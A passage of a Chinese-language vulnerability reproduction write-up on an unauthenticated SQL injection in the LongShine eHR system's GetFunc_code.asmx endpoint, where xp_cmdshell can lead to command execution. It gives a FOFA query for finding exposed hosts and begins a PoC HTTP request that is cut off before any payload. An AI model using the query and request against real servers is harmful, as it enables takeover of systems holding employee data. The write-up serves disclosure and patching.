0x01 产品简介

朗新天霁人力资源管理系统（LongShine eHR）是一款由北京朗新天霁软件技术有限公司研发的人力资源管理系统，该产品融合了国外先进的人力资源管理理念和国内大量人力资源管理实践经验，是国内功能较为全面、性价比较高的人力资源管理系统之一，系统凭借其集成化、自动化、数据化、移动化等特点，在企业管理中发挥着重要作用。它不仅提高了企业的管理效率和水平，还促进了员工和组织的发展，为企业的持续发展提供了有力支持。

0x02 漏洞概述

朗新天霁eHR GetFunc_code.asmx接口的GetMessage、GetShortMessage、GetToken等多个实例处存在SQL注入漏洞,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。

0x03 复现环境

FOFA：

body="/default.aspx?ReturnUrl=%2f" && body="silverlight"

0x04 漏洞复现 

PoC-1

POST /ws/GetFunc_code.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/Get